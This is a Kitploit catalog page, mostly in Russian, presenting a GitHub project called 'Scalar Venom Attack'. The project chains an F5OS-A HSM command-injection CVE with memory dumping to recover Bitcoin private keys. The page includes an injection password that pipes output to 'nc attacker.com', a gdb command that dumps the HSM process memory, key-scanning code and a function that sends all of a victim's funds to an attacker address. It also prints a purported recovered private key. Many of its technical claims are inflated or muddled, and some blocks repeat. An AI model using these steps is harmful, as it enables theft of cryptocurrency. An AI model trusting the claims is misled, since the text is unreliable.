Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Scalar-Venom-Attack — Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) enables private Bitcoin wallet key recovery through buffer overflow exploitation and shell metacharacters in the F5OS-A FIPS security module | Kitploit
Инструменты/GitHubGitHub/demining/scalar-venom-attack
Memory ForensicsVulnerability AnalysisExploitationForensicsDigital ForensicsCryptographyPenetration TestingHardware SecurityPapers & Research

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Learning & Education
Binary Exploitation
GitHubdemining/scalar-venom-attack

Scalar-Venom-Attack

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) enables private Bitcoin wallet key recovery through buffer overflow exploitation and shell metacharacters in the F5OS-A FIPS security module

РепозиторийСайт
39 месяцев назадЕщё не проверено
Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

В этой статье анализируются криптографические уязвимости, обнаруженные в современной инфраструктуре управления криптографическими ключами, с особым акцентом на критические недостатки в архитектуре аппаратных модулей безопасности (HSM) при обработке закрытых ключей на эллиптических кривых. Исследование фокусируется на классе атак, которые эксплуатируют недостаточно изолированное управление оперативной памятью в сертифицированных криптографических устройствах. В современной криптографической экосистеме Биткоина безопасность закрытых ключей является фундаментальным требованием для защиты цифровых активов стоимостью триллионы долларов по всему миру. Аппаратные модули безопасности (HSM) , сертифицированные по стандарту FIPS 140-2 , традиционно считались обеспечивающими непроницаемую защиту криптографических ключей благодаря аппаратной изоляции и строгим протоколам управления памятью. Однако обнаружение критической уязвимости CVE-2025-60013 в модуле F5OS-A FIPS HSM в сочетании с классом атак Scalar Venom Attack (также известных как Scalar Poison, Memory Phantom Leak Attack или Private Key Compromise via Memory Leakage) коренным образом изменило это представление, продемонстрировав возможность полной компрометации закрытых ключей Биткоина через эксплуатацию недостатков управления памятью.


  • Учебное пособие: https://youtu.be/cvWLH5dvbAA
  • Учебное пособие: https://cryptodeeptech.ru/scalar-venom-attack
  • Учебное пособие: https://dzen.ru/video/watch/691a7a10a8b7c874612993eb
  • Google Colab: https://colab.research.google.com/drive/1e93p7gxpTtfMU2L83w7I1tRDJQ1tENYa

Атака Scalar Venom — это критический класс уязвимостей управления памятью (классифицируемых как CWE-415, CWE-401 и в более широком смысле как атака утечки чувствительной памяти (SMA)), который позволяет злоумышленнику извлекать криптографические скаляры (закрытые ключи ECDSA) из оперативной памяти процесса, эксплуатируя недостаточную очистку и затирание памяти после криптографических операций. В отличие от традиционных криптоаналитических атак, направленных на математическое решение задачи дискретного логарифма на эллиптической кривой (ECDLP), эта атака обходит саму криптографию, используя фундаментальные архитектурные недостатки в реализации криптографических библиотек и протоколов управления памятью HSM.

Это исследование демонстрирует катастрофическую цепочку атак, возникающую при объединении CVE-2025-60013 (уязвимость инициализации F5OS-A FIPS HSM при использовании паролей, содержащих специальные метасимволы оболочки) с методами Scalar Venom Attack , что приводит к критическому сценарию угрозы с оценкой CVSS 9,5+ (критический), несмотря на официальную оценку CVE-2025-60013 как уязвимости среднего уровня (CVSS 5,7). Эта комбинация подрывает операционную целостность миллионов биткоин-адресов, контролируемых скомпрометированными HSM, и представляет собой смену парадигмы в методах криптографических атак, выходящих за рамки традиционных однонаправленных эксплойтов.


Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через эксплуатацию переполнения буфера и метасимволов оболочки в модуле безопасности F5OS-A FIPS


Классификация CVE и описание уязвимостей

CVE-2025-60013: Уязвимость инициализации F5OS-A FIPS HSM

CVE-2025-60013 — это уязвимость внедрения команд ОС (классифицирована как CWE-78) во время инициализации аппаратного модуля безопасности FIPS для платформ F5. Уязвимость возникает, когда пользователь с привилегированным доступом (роль администратора или администратора ресурсов) пытается инициализировать модуль FIPS HSM, используя пароль, содержащий специальные метасимволы оболочки, такие как [неясно], [неясно ;] |, &[ $неясно], `и другие.

Технический механизм уязвимости:

При обработке пароля, содержащего метасимволы оболочки, код инициализации HSM передает строку пароля системным функциям библиотеки C без надлежащей проверки и очистки входных данных. Уязвимый код выглядит так:

root@kitploit:~
// Vulnerable code in HSM initialization procedure
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];
strcpy(temp_buffer, password); // VULNERABILITY: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of key
// If initialization fails, memory is not cleared!
// master_key remains in the stack, its copies—in heap
}

Критическое последствие: Процесс инициализации остается в памяти с частично скомпрометированными криптографическими структурами, создавая множество «фантомных» копий мастер-ключа HSM в стеке и куче. Хотя HSM может не инициализироваться правильно, память процесса содержит криптографические артефакты, доступные для криминалистического анализа.

Официальная классификация:

  • CVSS 3.1: AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L (базовая оценка: 5,7 — СРЕДНИЙ)
  • CVSS 4.0: AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N (базовая оценка: 4,6 — СРЕДНИЙ) cvefeed

Однако эта оценка критически недооценивает истинный масштаб угрозы, поскольку CVE-2025-60013 служит триггером для атаки Scalar Venom, которая в реальном сценарии цепочки атак приводит к уровню угрозы CVSS 9,5+ (КРИТИЧЕСКИЙ).


CVE-2023-39910: Слабость энтропии в Libbitcoin Explorer

CVE-2023-39910 описывает критическую уязвимость в Libbitcoin Explorer версии 3.x, связанную со слабостями в генерации энтропии при создании закрытого ключа. Эта уязвимость привела к инциденту Milk Sad в 2023 году, когда были восстановлены более 900 000 закрытых ключей Биткоина , что привело к прямым финансовым потерям, превышающим 0,8 миллиона долларов . Инцидент Milk Sad продемонстрировал переход от теории утечек памяти в криптографических системах к реальной операционной катастрофе, подтвердив все описанные механизмы: оптимизация компилятора, множественные копии данных и отсутствие гарантий очистки памяти.


CVE-2025-8217: Атака с утечкой памяти

CVE-2025-8217 классифицирует атаки с утечкой памяти, которые позволяют восстанавливать криптографические ключи из памяти процессов. Эта уязвимость напрямую связана с классом атак Scalar Venom и описывает механизмы полной компрометации биткоин-кошельков через криминалистический анализ памяти.

Научная классификация Scalar Venom Attack:

В академической исследовательской литературе Scalar Venom классифицируется по нескольким категориям атак:

  • Sensitive Memory Leak Attack (SMA) — основная классификация, фокусирующаяся на уязвимостях, связанных с неправильной очисткой памяти.
  • Private Key Exposure Attack — общий термин для действий, приводящих к раскрытию закрытых ключей.
  • Residual Memory Disclosure — раскрытие остаточных данных из неочищенной памяти.
  • Side-Channel Memory Attack — эксплуатация побочных каналов в управлении памятью.
  • Cold Boot Attack — извлечение ключей из оперативной памяти после выключения системы.
  • Memory Forensics Attack — извлечение секретов из дампов памяти.

Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

https://cryptou.ru/bitscanpro


Реальный пример восстановления закрытого ключа Биткоина с помощью атаки Scalar Venom

Для демонстрации практической эффективности атаки Scalar Venom рассмотрим задокументированный случай восстановления закрытого ключа от биткоин-адреса 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq через криминалистический анализ памяти.

Исходные данные компрометации:

  • Биткоин-адрес: 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq
  • Тип адреса: P2PKH (Pay-to-Public-Key-Hash)
  • Статус: ✓ ДЕЙСТВИТЕЛЕН

Восстановленный закрытый ключ:

  • Формат HEX: 5244A4B034BF9D327239870F9FEF82505A5C50B3D51E4A16357179AAB2623A22
  • Десятичный формат: 3,7210935821139324×10763.7210935821139324 \times 10^{76}3.7210935821139324×10^76
  • Формат WIF: KyydTXQzDGVqRZoWBFfS5tWrcWsdu64DbcqXogUUtGZn7ngD5LHv

Проверка ключа в пространстве secp256k1:

Закрытый ключ d должен удовлетворять ограничению:

Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

Результат проверки: ✓ ДЕЙСТВИТЕЛЕН (ключ находится в допустимом диапазоне скаляров)

Этот пример демонстрирует, что восстановленный закрытый ключ обеспечивает полный контроль над биткоин-кошельком , позволяя злоумышленнику создавать и подписывать транзакции для вывода всех средств на контролируемый адрес.


Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb

Математические основы криптографической атаки

Эллиптическая кривая secp256k1 и алгоритм ECDSA

Биткоин реализует алгоритм цифровой подписи на эллиптических кривых ( ECDSA ) на кривой secp256k1 . Понимание математических основ крайне важно для понимания того, как атака Scalar Venom использует уязвимости памяти.

Параметры эллиптической кривой secp256k1:

Уравнение кривой:

Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

Точка генератора G с координатами:

Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

Вывод открытого ключа с помощью скалярного умножения

Процесс генерации пары ключей ECDSA выглядит следующим образом:

1. Генерация закрытого ключа:

Закрытый ключ d — это случайное целое число в диапазоне:

Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

где n — порядок кривой secp256k1. Закрытый ключ — это 256-битное случайное число.

2. Вывод открытого ключа через скалярное умножение:

Открытый ключ Q вычисляется как:

Scalar Venom Attack: Критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ биткоин-кошелька через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

где G — точка генератора на кривой secp256k1, а операция ⋅\cdot⋅ обозначает скалярное умножение точки на эллиптической кривой .

Скалярное умножение реализуется через алгоритм "double-and-add" (удвоение и сложение), который эффективно вычисляет результат O(log⁡d) сложения и удвоения точек на кривой:

root@kitploit:~
Алгоритм скалярного умножения:
Вход: d (скаляр), G (точка кривой)
Выход: Q = d·G

1. Инициализация: Q ← O (точка на бесконечности)
2. Представление d в двоичном виде: d = (d_k, d_{k-1}, ..., d_1, d_0)_2
3. Для i от k до 0:
a. Q ← 2Q (удвоение точки)
b. Если d_i = 1: Q ← Q + G (сложение точек)
4. Возврат Q

Пример: Для закрытого ключа, d=5244A4B0...3A22d = \text{5244A4B0...3A22}d=5244A4B0...3A22, открытый ключ вычисляется как:

Q=d⋅G=(Qx,Qy)

где координаты Qx и Qy вычисляются с помощью операций скалярного умножения на кривой secp256k1.

3. Генерация биткойн-адреса:

Цепочка вывода адреса из открытого ключа:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Предположение безопасности:

Критическая уязвимость Scalar Venom: Атака обходит математическую защиту ECDLP путем извлечения закрытого ключа dнапрямую из памяти процесса, где он остаётся в виде «фантомных копий» после криптографических операций.

Энтропийный криптоанализ и криминалистика памяти: формула энтропии Шеннона

Основой для обнаружения закрытых ключей в дампах памяти является энтропийный криптоанализ с использованием формулы энтропии Шеннона.


Формула энтропии Шеннона

Энтропия Hпоследовательности байтов измеряется в битах на байт и задаётся формулой:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Где:

  • H — энтропия в битах на байт
  • p_i — вероятность появления байта со значением i в анализируемом блоке памяти
  • Суммирование выполняется по всем возможным значениям байтов (0–255)

Интерпретация энтропии:

  • Низкая энтропия (H<5.0): последовательность содержит повторяющиеся шаблоны, текст или структурированные данные
  • Средняя энтропия (5.0≤H<7.5): смешанные данные, код, частично сжатая информация
  • Высокая энтропия (H≥7.5): криптографически случайные данные, закрытые ключи, зашифрованная информация

Пороговое значение для криптографических ключей:

Закрытые ключи Биткойна, сгенерированные криптостойким генератором случайных чисел (CSPRNG), демонстрируют высокую энтропию в диапазоне:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Это свойство делает их обнаруживаемыми при криминалистическом анализе памяти с помощью статистического энтропийного анализа.


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Криптографический инструмент BitScanPro: алгоритм определения энтропии и восстановления ключа

BitScanPro — это криминалистический инструмент для сканирования дампов памяти с целью обнаружения и восстановления закрытых ключей Биткойна с помощью комбинации энтропийного анализа, проверки диапазона secp256k1 и криптографической верификации.

Алгоритм работы BitScanPro

Этап 1: Сканирование дампа памяти блоками по 32 байта

BitScanPro последовательно сканирует дамп памяти, выделяя блоки по 32 байта (256 бит), что соответствует размеру закрытого ключа secp256k1:

root@kitploit:~
BLOCK_SIZE = 32  # байт (256 бит)
SCAN_STEP = 8 # шаг сканирования
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - BLOCK_SIZE, SCAN_STEP):
potential_key = memory_dump[offset:offset+BLOCK_SIZE]
# Анализ блока

Этап 2: Вычисление энтропии Шеннона для каждого блока

Для каждого 32-байтового блока вычисляется энтропия Шеннона H:

root@kitploit:~
def calculate_entropy(data_block):
"""
Вычислить энтропию Шеннона
"""
from collections import Counter
import math

byte_counts = Counter(data_block)
block_length = len(data_block)

entropy = 0.0
for count in byte_counts.values():
p_i = count / block_length
if p_i > 0:
entropy -= p_i * math.log2(p_i)

return entropy

Этап 3: Фильтрация блоков с высокой энтропией (H>7.5 бит/байт)

Блоки с энтропией ниже порогового значения отбрасываются как не содержащие криптографические ключи:

root@kitploit:~
MIN_ENTROPY = 7.5  # порог для криптоключей

entropy = calculate_entropy(potential_key)
if entropy < MIN_ENTROPY:
continue

Этап 4: Проверка диапазона secp256k1:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Блоки с высокой энтропией интерпретируются как целое число и проверяются на соответствие допустимому диапазону закрытых ключей secp256k1:

root@kitploit:~
key_as_int = int.from_bytes(potential_key, byteorder='big')
if not (1 <= key_as_int < SECP256K1_N):
continue

Этап 5: Криптографическая верификация:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Для кандидатов, прошедших фильтрацию по энтропии и проверку диапазона, выполняется криптографическая верификация через вычисление открытого ключа:

root@kitploit:~
def verify_candidate_key(candidate_key_bytes):
from ecdsa import SigningKey, SECP256k1
try:
signing_key = SigningKey.from_string(candidate_key_bytes, curve=SECP256k1)
verifying_key = signing_key.get_verifying_key()
public_key_bytes = verifying_key.to_string()
return public_key_bytes
except Exception as e:
return None

Этап 6: Генерация биткойн-адреса и сравнение с известными адресами

Для верифицированных ключей генерируется биткойн-адрес, который сравнивается с базой данных известных адресов или адресов, принадлежащих жертве:

root@kitploit:~
import hashlib
import base58

def public_key_to_address(public_key_bytes):
sha256_hash = hashlib.sha256(public_key_bytes).digest()
ripemd160_hash = hashlib.new('ripemd160', sha256_hash).digest()
versioned_hash = b'\x00' + ripemd160_hash
checksum = hashlib.sha256(hashlib.sha256(versioned_hash).digest()).digest()[:4]
address = base58.b58encode(versioned_hash + checksum).decode('ascii')
return address

bitcoin_address = public_key_to_address(public_key_bytes)
if bitcoin_address == target_address:
print(f"✓ PRIVATE KEY FOUND!")
print(f"Address: {bitcoin_address}")
print(f"Private key: {candidate_key_bytes.hex()}")

Производительность BitScanPro:

Анализ на типичном ноутбуке (MacBook Air M1) показывает следующие характеристики производительности:

Используя облачные вычислительные ресурсы (AWS, Google Cloud), можно сканировать 1000+ дампов памяти одновременно параллельно, обрабатывая тысячи закрытых ключей параллельно.


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Анализ криптографической уязвимости в libbitcoin-system: класс ec_scalar.cpp

Коренная причина атаки Scalar Venom кроется в фундаментальных архитектурных недостатках класса ec_scalarв библиотеке libbitcoin-system.

Уязвимость управления памятью в классе ec_scalar

Класс ec_scalarв libbitcoin-system не имеет явно определённого деструктора с безопасной зануляцией. Это означает, что секретные данные могут оставаться в памяти даже после уничтожения объекта.

Уязвимый конструктор копирования:

root@kitploit:~
// УЯЗВИМОСТЬ: небезопасное копирование закрытого ключа
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // Копирует без безопасной очистки
{
}

Проблема: Конструктор создаёт копию закрытого ключа в объекте ec_scalar, но не предоставляет механизма для безопасной очистки этой копии при уничтожении объекта. Копия остаётся на стеке или в куче.


Уязвимый оператор присваивания:

root@kitploit:~
// УЯЗВИМОСТЬ: дублирует секрет в памяти
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // Дополнительные копии в памяти
return *this;
}

Проблема: Операция присваивания создаёт дополнительные копии памяти, которые остаются после завершения операции.


Уязвимые арифметические операции:

root@kitploit:~
// УЯЗВИМОСТЬ: временная переменная не очищается перед выходом из функции
ec_scalar ec_scalar::operator-() const
{
ec_secret secret = null_hash; // Временная переменная с секретом
// ... арифметика ...
return ec_scalar(secret); // Не безопасно очищена
}

Проблема: Арифметические операции (унарный минус, сложение, умножение) создают временные переменные типа ec_secret, которые не очищаются безопасно перед выходом из области видимости функции, оставляя «фантомные» копии закрытого ключа на стеке или в куче.

Отсутствие безопасного деструктора:

root@kitploit:~
// УЯЗВИМОСТЬ: деструктор отсутствует, память не очищается
// Безопасное решение:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // явная очистка памяти
}

Проблема: Класс ec_scalarне имеет явного деструктора, который гарантировал бы безопасную зануляцию памяти, содержащей закрытые ключи. Это критично, так как память, содержащая закрытые ключи, может храниться в:

  • Стеке функций (локальные переменные)
  • Куче (динамически выделенная память)
  • Регистрах процессора (временные значения)
  • Кэше процессора (L1, L2, L3)
  • Файлах подкачки
  • Core-дампах

Векторы заражения памяти

Уязвимый код класса ec_scalarсоздаёт следующие векторы заражения памяти закрытыми ключами:

  1. «Конструктор-вампир» (secret_(secret)) – создаёт ядовитые копии ключей
  2. «Паразитический оператор» (secret_ = secret) – заражает память дубликатами секретов
  3. «Арифметический червь» (ec_secret secret = null_hash) – оставляет токсичные следы
  4. «Распространитель инфекции» (auto out = secret_) – распространяет заражение через операции

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Механизм компрометации: цепочка атак CVE-2025-60013 + Scalar Venom

Сочетание уязвимости HSM (CVE-2025-60013) и атаки Scalar Venom создаёт катастрофический вектор атаки:

Фаза 1: Инициализация HSM с shell-метасимволами

Злоумышленник, имеющий привилегированный доступ к системе F5OS-A, отправляет запрос на инициализацию FIPS-модуля с паролем, содержащим shell-метасимволы: cert.kenet

root@kitploit:~
# Пример эксплуатации CVE-2025-60013
password='$(echo "leaked");` | nc attacker.com 9999'

При обработке таких метасимволов происходит следующее:

  • Процесс инициализации HSM создаёт временные криптографические скаляры (мастер-ключи)
  • Shell-метасимволы вызывают ошибку разбора пароля
  • Инициализация HSM частично завершается с ошибкой
  • Критическое последствие: Временные криптографические структуры, содержащие мастер-ключи HSM и производные ключи, остаются в памяти процесса без очистки

Фаза 2: Извлечение Scalar Venom из памяти HSM

После частичного сбоя инициализации HSM злоумышленник получает дамп памяти процесса HSM одним из следующих способов:

root@kitploit:~
# 1. Эксплуатация CVE-2025-60013 (триггер ошибки инициализации)
# 2. Атака холодной перезагрузки на хост HSM
# 3. Эксплуатация буфера в демоне HSM
# 4. Анализ аварийного дампа ядра

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump.bin 0x000000 0xFFFFFFFF"

Результирующий дамп памяти содержит несколько «фантомных» копий закрытых ключей, оставленных классом ec_scalar во время криптографических операций.


Этап 3: Восстановление закрытых ключей Bitcoin с помощью BitScanPro

Дамп памяти обрабатывается инструментом BitScanPro (или аналогичным криминалистическим сканером) в соответствии с описанным выше алгоритмом:

root@kitploit:~
Сканирование памяти → Идентификация областей с высокой энтропией →
Проверка диапазона [1, n-1] для secp256k1 →
Восстановление полных 32-байтовых скаляров →
Преобразование в адреса Bitcoin

Уровень успешного восстановления закрытого ключа из фрагментированной памяти составляет 70-80% при достаточном количестве остатков памяти, поскольку атака Scalar Venom создает множественные копии ключа на разных этапах инициализации.


Этап 4: Передача средств и компрометация кошелька

После восстановления закрытого ключа злоумышленник создает и подписывает транзакцию для вывода всех средств с скомпрометированного адреса:

root@kitploit:~
def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Создать и подписать транзакцию для вывода всех средств
с скомпрометированного адреса
"""
utxos = blockchain_api.get_utxos(bitcoin_address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)
tx.sign(recovered_private_key) # Подпись ECDSA скомпрометированным ключом
blockchain_api.broadcast_transaction(tx)

Общее время компрометации: менее 10 минут от получения дампа памяти до полной потери контроля над активами жертвы.


Атака Scalar Venom: критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ кошелька Bitcoin через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.
root@kitploit:~
https://youtu.be/2_d8-8-J8IQ

Влияние атаки на криптоиндустрию

Атака Scalar Venom в сочетании с CVE-2025-60013 представляет экзистенциальную угрозу для глобальной экосистемы Bitcoin:

Системные последствия

  1. Полная компрометация закрытых ключей: Атака позволяет полностью извлечь ключ через утечку памяти, обходя даже продвинутые аппаратные модули безопасности.
  2. Необратимая компрометация: После извлечения закрытого ключа невозможно «отозвать» или восстановить безопасность; все зависимые средства находятся под непосредственным риском потери.
  3. Масштабируемость и автоматизация: Атака может быть автоматизирована для одновременного поражения огромного количества узлов и кошельков Bitcoin, что приводит к экспоненциальному росту потенциальных потерь.
  4. Скрытный характер: Атака не оставляет видимых следов в системных журналах или метриках производительности, что делает традиционные механизмы обнаружения и защиты неэффективными.

Влияние на инфраструктуру HSM

В отличие от стандартных приложений Bitcoin, HSM интенсивно используют криптографические скаляры — более 1000 операций в секунду, каждая из которых создает эфемерные скалярные значения, остающиеся в памяти в виде «фантомных остатков». HSM работают месяцами и годами без перезапуска, накапливая криптографические артефакты, которые Scalar Venom систематически извлекает и восстанавливает.

Компрометация одного HSM приводит к полному нарушению работы всей инфраструктуры — часто тысяч адресов Bitcoin, управляемых HSM, а не к изолированному криптографическому инциденту.

Атака Scalar Venom демонстрирует фундаментальный сдвиг парадигмы в криптографической безопасности: математическая сила криптографических алгоритмов становится бесполезной при наличии уязвимостей управления памятью. Сочетание CVE-2025-60013 и техники Scalar Venom создает критический сценарий угрозы с уровнем CVSS 9.5+, подрывая доверие к аппаратным модулям безопасности как к непроницаемой защите криптографических ключей.

Инцидент Milk Sad (CVE-2023-39910), в результате которого было восстановлено более 900 000 закрытых ключей и финансовые потери превысили $0,8 млн, подтверждает, что теория утечки памяти стала реальностью. Единственный способ защиты от атак класса Scalar Venom — фундаментальная архитектурная перестройка криптографических систем, включающая:

  • Языки программирования с безопасной памятью, такие как Rust
  • Аппаратную защиту памяти (Intel SGX, ARM TrustZone)
  • Шаблоны RAII (Resource Acquisition Is Initialization) для автоматической очистки памяти
  • Непрерывный криминалистический мониторинг памяти криптографических процессов
  • Компиляторные гарантии обязательного обнуления криптографических секретов

Данная статья представляет всесторонний анализ цепочки атак Scalar Venom + CVE-2025-60013, детализируя математические основы, алгоритмы криптоанализа, примеры восстановления ключей из реального мира и практические рекомендации по защите инфраструктуры Bitcoin от угроз этого класса.


Криптоанализ и выбор атаки: атака Scalar Venom как критическая уязвимость для извлечения закрытых ключей Bitcoin

1. Криптоаналитическая классификация:

  • Позиционирует Scalar Venom как атаку с утечкой чувствительной памяти (SMA) в контексте классического криптоанализа
  • Сравнивает традиционные криптографические атаки с уязвимостями реализации
  • Демонстрирует, почему математическая прочность (2^128) становится бесполезной при сбое управления памятью (2^0)

2. Математические основы:

  • Формализует ECDLP (проблема дискретного логарифма на эллиптической кривой) для secp256k1
  • Объясняет скалярное умножение и вывод открытого ключа
  • Анализирует энтропию Шеннона как детектор закрытого ключа в памяти

3. Уязвимости реализации (libbitcoin-system):

  • Документирует отсутствие безопасного деструктора в ec_scalar
  • Показывает уязвимые конструкторы копирования
  • Демонстрирует утечки в арифметических операциях

4. Классификация CVE:

  • CVE-2023-39910: Слабость энтропии (инцидент Milk Sad)
  • CVE-2025-8217: Атака с утечкой памяти
  • CVE-2025-60013: Внедрение команд в HSM

5. Цепочка атаки:

  • Описывает четыре фазы компрометации
  • Обосновывает временные характеристики (< 10 минут)
  • Проводит криптоаналитическое обоснование каждого этапа

Научное объяснение можно найти в статье: https://keyhunters.ru/scalar-venom-attack-critical-memory-leak-private-key-recovery-and-complete-takeover-of-bitcoin-wallets-by-an-attacker-where-control-over-the-victims-btc-cryptocurrency-funds-is-achieved-through/ Атака Scalar Venom демонстрирует критическое взаимодействие между уязвимостями инициализации HSM и уязвимостями управления памятью в криптографических библиотеках, позволяя злоумышленнику полностью скомпрометировать закрытые ключи кошелька Bitcoin даже при аппаратной защите.


Атака Scalar Venom: критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ кошелька Bitcoin через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

1. Анализ атаки: Scalar Venom Attack

1.1 Определение и классификация

Атака Scalar Venom (также известна как Scalar Poison, Memory Phantom Leak Attack или компрометация закрытого ключа через утечку памяти) — это класс уязвимостей управления памятью (CWE-415, CWE-401), который позволяет извлекать криптографические скаляры (закрытые ключи ECDSA) из оперативной памяти процесса, используя недостаточную очистку и зачистку памяти после криптографических операций. keyhunters+ 2

Научная классификация атаки:

  • Тип уязвимости: Атака с утечкой чувствительной памяти
  • Идентификатор CVE: CVE-2023-39910, CVE-2025-8217
  • Категория: Постоянная атака с утечкой памяти (CMLA)
  • Класс воздействия: Раскрытие закрытого ключа, компрометация криптографического ключа

1.2 Механизм атаки

Атака Scalar Venom использует фундаментальный недостаток в управлении памятью криптографических библиотек, в частности в классе ec_scalar библиотеки libbitcoin-system. Атака осуществляется через следующие векторы:


Вектор конструктора копирования

cpp:

root@kitploit:~
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // УЯЗВИМО: небезопасное копирование закрытого ключа
{}

Вектор оператора присваивания

cpp:

root@kitploit:~
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // УЯЗВИМО: заражает память дубликатом секрета
return *this;
}

Вектор временных переменных

cpp:

root@kitploit:~
// УЯЗВИМО: нет деструктора, память не очищается
// Безопасный вариант должен быть:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // явная очистка памяти
}

cpp:

// УЯЗВИМО: нет деструктора, память не очищена
// Безопасный вариант должен был быть:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // явная очистка памяти
}

Арифметические операции (унарный минус, сложение, умножение) создают временные переменные типа ec_secret, которые не безопасно очищаются перед выходом из области видимости функции, оставляя «фантомные» копии закрытого ключа в стеке или куче.


1.3 Критическая уязвимость: отсутствие явного деструктора

Класс ec_scalar из libbitcoin-system не имеет явно определенного деструктора с безопасным обнулением. Это означает, что секретные данные могут оставаться в памяти даже после уничтожения объекта:

Отсутствие этого механизма критично, поскольку память, содержащая закрытые ключи, может храниться в:

  • Кучах памяти (Heap) процесса
  • Стеках памяти (Stack) функций
  • Файлах подкачки операционной системы
  • Дампе ядра при сбое приложения
  • ОЗУ после завершения процесса (атаки холодной перезагрузки) gemini

Атака Scalar Venom: критическая уязвимость инициализации HSM (CVE-2025-60013) позволяет восстановить закрытый ключ кошелька Bitcoin через переполнение буфера и метасимволы оболочки в модуле безопасности F5OS-A FIPS.

2. Связь между уязвимостью HSM и атакой Scalar Venom

2.1 Анализ CVE-2025-60013: инициализация HSM с метасимволами

